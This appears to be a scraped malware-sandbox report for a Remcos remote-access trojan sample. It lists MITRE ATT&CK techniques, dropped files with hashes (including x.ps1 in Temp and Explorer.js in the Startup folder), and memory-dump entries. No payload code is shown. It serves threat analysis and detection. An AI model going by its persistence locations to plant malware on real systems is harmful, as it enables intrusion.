T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
a277596468fec0c248385c1c3ed0d049

SHA1
96b93eaa77d2ff4fa7b460e40f0d3bf36904dc4d

SHA256
a84b993ca402294b12cc1da28b2407219f1cfafc7b8d85f81fb39cdee31ba22e

SHA512
1e069cb2a6fa7609c03324df4d492b429011a6529b8c482ee801ada056c5354c2be6fe4b974ed731f418382967c7a5da7b9cecc3fac745834c80a24714f7259a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
47ad785a164d8ff087b5fc8372b82520

SHA1
f23b4ab647065004331d06eb701783f4c89a74dd

SHA256
03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

SHA512
c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
19db90b6d6477ea13a951adcbea26d48

SHA1
22050faf81f67751ecb06cbb623cb7ba57c1ddfb

SHA256
3e7d9a54dd5c88788ba71c8a04631f3cd2ec75c80be05d28ab16a9c10ba2a420

SHA512
a61f74fe848e45035a77dc4c261638639b75d7bf24c2d8cce3f435a3bb2cda6a81922f20fc6a58046fa4f44d5234a65f1bd2cf17cb5269a7192b077097cb587e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
5b5a2335cfd16f7e0ea1d5c08b17aab8

SHA1
b25a15599249db24e2027a0bf1c52b19508435c3

SHA256
5bf881674e2ec334c2296d9ce517e55d47831546c83ff954856db426f23f74fd

SHA512
600b5d6c3836cb68930d411d849a70cd5d52a922f4c980358431c668bc3dd990fe11def9ec6bbd1f1fd2552bb28034ad4d187d3e1f34d3e8e35db4a2c5fdaacc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v21yrx04.dmk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.ps1

Filesize
1.9MB

MD5
3416b218d4220a8e99bf4a29f6d3931e

SHA1
0205ec0ba9b20bc065627380cbd4e423a605bcf5

SHA256
72e6c2e56e12ce2c101e25d2beba700e4a722fc8f2b28ac246dc20261fb248aa

SHA512
4ddd91adffe050285c9f7d841a3cf6345d63a9b26fbc87ab5892b6ff1429e571b9cb0d2bbaf23707f85ca25619867a91da4665a8c7723b2e93645a9297cb96f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js

Filesize
11KB

MD5
bc2815cd629832eb6587e9bcf1751274

SHA1
417d388a25395fc4d5fe374923a51ba045f5c042

SHA256
644e9e48ac514181291f63cb362ea3b7042045c6b1841ebf6831e534d4fbbce0

SHA512
4a5dd880ae533afde6ff88554818566d5cfef21af116f30e18fdf943728e9b8e58b9b1db331de0e438947233afd786c92fad2f9071d3652e3a16c9868a980248

Download Submit
memory/640-37-0x00000000076B0000-0x0000000007D2A000-memory.dmp

Filesize
6.5MB

Download
memory/640-40-0x0000000007250000-0x00000000072EC000-memory.dmp

Filesize
624KB

Download
memory/640-39-0x00000000071A0000-0x00000000071A8000-memory.dmp

Filesize
32KB

Download
memory/640-38-0x00000000062B0000-0x00000000062CA000-memory.dmp

Filesize
104KB

Download
memory/2264-13-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/2264-27-0x0000000006710000-0x000000000675C000-memory.dmp

Filesize
304KB

Download
memory/2264-26-0x0000000006160000-0x000000000617E000-memory.dmp

Filesize
120KB

Download
memory/2264-25-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/2264-23-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/2264-24-0x0000000005B50000-0x0000000005EA4000-memory.dmp

Filesize
3.3MB

Download
memory/2264-11-0x00000000059D0000-0x00000000059F2000-memory.dmp

Filesize
136KB

Download
memory/2264-12-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download
memory/2264-9-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/2264-10-0x0000000005330000-0x0000000005958000-memory.dmp

Filesize
6.2MB

Download
memory/2264-58-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/2264-8-0x0000000002B90000-0x0000000002BC6000-memory.dmp

Filesize
216KB

Download
memory/2924-72-0x0000000007120000-0x000000000713E000-memory.dmp

Filesize
120KB

Download
memory/2924-74-0x00000000072F0000-0x00000000072FA000-memory.dmp

Filesize
40KB

Download
memory/2924-76-0x0000000007480000-0x0000000007491000-memory.dmp

Filesize
68KB

Download
memory/2924-75-0x0000000007510000-0x00000000075A6000-memory.dmp

Filesize
600KB

Download
memory/2924-60-0x0000000005FC0000-0x000000000600C000-memory.dmp

Filesize
304KB

Download
memory/2924-61-0x0000000006520000-0x0000000006552000-memory.dmp

Filesize
200KB

Download
memory/2924-62-0x0000000075C30000-0x0000000075C7C000-memory.dmp

Filesize
304KB

Download
memory/2924-73-0x00000000071D0000-0x0000000007273000-memory.dmp

Filesize
652KB

Download
memory/3552-3-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/3552-42-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/3552-4-0x0000000005190000-0x00000000052C0000-memory.dmp

Filesize
1.2MB

Download
memory/3552-41-0x00000000753AE000-0x00000000753AF000-memory.dmp

Filesize
4KB

Download
memory/3552-2-0x00000000753A0000-0x0000000075B50000-memory.dmp

Filesize
7.7MB

Download
memory/3552-1-0x0000000000270000-0x00000000003CE000-memory.dmp

Filesize
1.4MB

Download
memory/3552-0-0x00000000753AE000-0x00000000753AF000-memory.dmp

Filesize
4KB

Download
memory/3592-101-0x0000000005730000-0x000000000573A000-memory.dmp

Filesize
40KB

Download
memory/3592-100-0x0000000005790000-0x0000000005822000-memory.dmp

Filesize
584KB

Download
memory/3592-99-0x0000000005B80000-0x0000000006124000-memory.dmp

Filesize
5.6MB

Download
memory/3592-95-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3720-87-0x00000000060D0000-0x00000000060E8000-memory.dmp

Filesize
96KB

Download
memory/4632-109-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-138-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-93-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-94-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-102-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-103-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-105-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-106-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-108-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-111-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-112-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-113-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-115-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-116-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-117-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-119-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-120-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-121-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-123-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-124-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-125-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-127-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-128-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-129-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-131-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-132-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-133-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-135-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-136-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-139-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-140-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-141-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-143-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-144-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-146-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-147-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-148-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-149-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-151-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-152-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-154-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-155-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-156-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-157-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-159-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-160-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-162-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-163-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-164-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-165-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-167-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-168-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-170-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-171-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-172-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-174-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-175-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4632-176-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download